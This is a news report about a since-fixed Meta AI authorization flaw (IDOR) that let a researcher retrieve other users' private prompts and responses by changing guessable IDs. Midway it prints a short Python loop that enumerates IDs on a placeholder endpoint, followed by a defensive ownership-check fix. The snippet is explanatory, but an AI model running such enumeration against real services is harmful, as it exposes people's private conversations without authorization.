Meta fixes AI vulnerability that could have leaked private user conversations: Report



Meta AI reportedly had a vulnerability that could be exploited to access other users' private conversations with the chatbot. Exploiting the bug did not require infiltrating Meta's servers or manipulating the app's code; an attacker could simply analyze the browser's network traffic to trigger it. According to the report, a security researcher spotted the bug late last year and notified the Menlo Park-based social media giant. The company rolled out a fix in January and rewarded the researcher for finding the exploit.

According to a report by TechCrunch, the Meta AI vulnerability was discovered by Sandeep Hodkasia, founder of security testing firm AppSecure. The researcher reportedly notified Meta about it in December 2024 and received a bug bounty of $10,000 (approximately Rs 8.5 lakh). Meta spokesperson Ryan Daniels told the publication that the issue was fixed in January and that the company found no evidence of the bug being abused by bad actors.

The vulnerability reportedly stemmed from the way Meta AI handles user prompts on its servers. Per the report, Meta AI assigns a unique ID to every prompt and its AI-generated response whenever a logged-in user edits a prompt to regenerate an image or text. Editing prompts is a common use case, as most people refine their prompts conversationally to get a better response or the desired image.

Hodkasia reportedly discovered that by analyzing his browser's network traffic while editing an AI prompt, he could see the unique ID assigned to it. By then changing that number, he could retrieve someone else's prompt and its AI-generated response, the report said. Hodkasia noted that these IDs were "easy to guess," so finding another user's valid ID took little effort.
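
The flaw follows the classic insecure direct object reference (IDOR) pattern. A minimal sketch of how such enumeration works in general, assuming a hypothetical endpoint, parameter names, and sequential IDs (Meta's actual API paths and ID format are not public):

import requests

# All names below are illustrative assumptions, not Meta's real API.
BASE_URL = "https://example.invalid/api/prompts"  # placeholder endpoint
COOKIES = {"session": "attacker-own-valid-session-token"}

# Suppose the attacker's own edit request exposed prompt ID 100234 in
# network traffic. If IDs are sequential and the server never checks
# ownership, nearby IDs return other users' prompts and responses.
for prompt_id in range(100200, 100300):
    resp = requests.get(f"{BASE_URL}/{prompt_id}", cookies=COOKIES, timeout=10)
    if resp.ok:
        print(prompt_id, resp.json())  # someone else's private conversation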

Essentially, the vulnerability lay in how Meta's servers handled authorization for these unique IDs: they did not check whether the person requesting the data was actually allowed to see it. In the hands of bad actors, an automated version of this method could have scraped a large amount of users' private data.
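
The standard remedy for an IDOR bug is a server-side ownership check before any record is returned. A minimal sketch under the same assumptions (generic handler and data-access names, not Meta's actual code):

class NotFound(Exception):
    """Raised when a record does not exist or the caller may not see it."""

def get_prompt(prompt_id, current_user, db):
    # db.find_prompt is a hypothetical data-access helper.
    record = db.find_prompt(prompt_id)
    if record is None or record.owner_id != current_user.id:
        # Responding as if the record does not exist avoids confirming
        # to an attacker that a guessed ID is valid.
        raise NotFound()
    return record

Pairing a check like this with long, random, non-sequential IDs also makes enumeration impractical even if an authorization check is ever missed.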

Notably, a report last month found that the Meta AI app's Discover feed was filled with posts that appeared to be private conversations with the chatbot, including requests for medical and legal advice and even confessions of crimes. Later in June, the company began showing a warning message to discourage people from unknowingly sharing their conversations publicly.


